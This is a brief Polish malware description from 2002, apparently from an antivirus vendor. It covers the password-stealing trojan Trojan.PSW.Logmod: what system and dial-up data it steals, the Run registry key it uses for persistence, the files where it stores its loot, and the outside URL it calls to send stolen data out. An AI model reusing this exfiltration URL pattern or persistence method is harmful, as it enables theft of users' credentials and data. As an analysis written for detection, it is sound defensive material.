12 lipca 2002

Trojan.PSW.Logmod - kradnie

Jest to wirus należący do rodziny koni trojańskich kradnących dane. Trojan kradnie z zainfekowanych systemów następujące informacje: numer wersji systemu Windows oraz Explorera, wpisy książki telefonicznej, informacje o dostawcy internetu, dane RAS (Remote Access Service), rejestr modemu itd.

Po uruchomieniu trojan tworzy klucz w sekcji auto-run rejestru systemowego:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run Sysres = Sysres.exe

Wirus nie kopiuje ani nie przenosi swojego pliku do żadnego katalogu i z tego powodu nie uruchamiać się automatycznie wraz ze startem systemu operacyjnego tylko wtedy, gdy plik ten znajduje się w folderze Windows lub systemowym Windows.

W celu wysyłania ukradzionych danych trojan otwiera adres:

http://stats.internetsexprovider.com/resident/SysWeb.php3?
country=espana4&Login= %dane%

gdzie %dane% to wysyłane informacje.

Funkcje dodatkowe

Trojan tworzy następujące pliki w folderze Windows: SysTrace.daf, CallTrace.daf, DialTrace.daf. Pliki te wykorzystywane są do przechowywania ukradzionych danych.

Ponadto szkodnik tworzy na własny użytek dodatkowy klucz w rejestrze systemowym:

HKLM\Software\DIALPASS
DateEspana4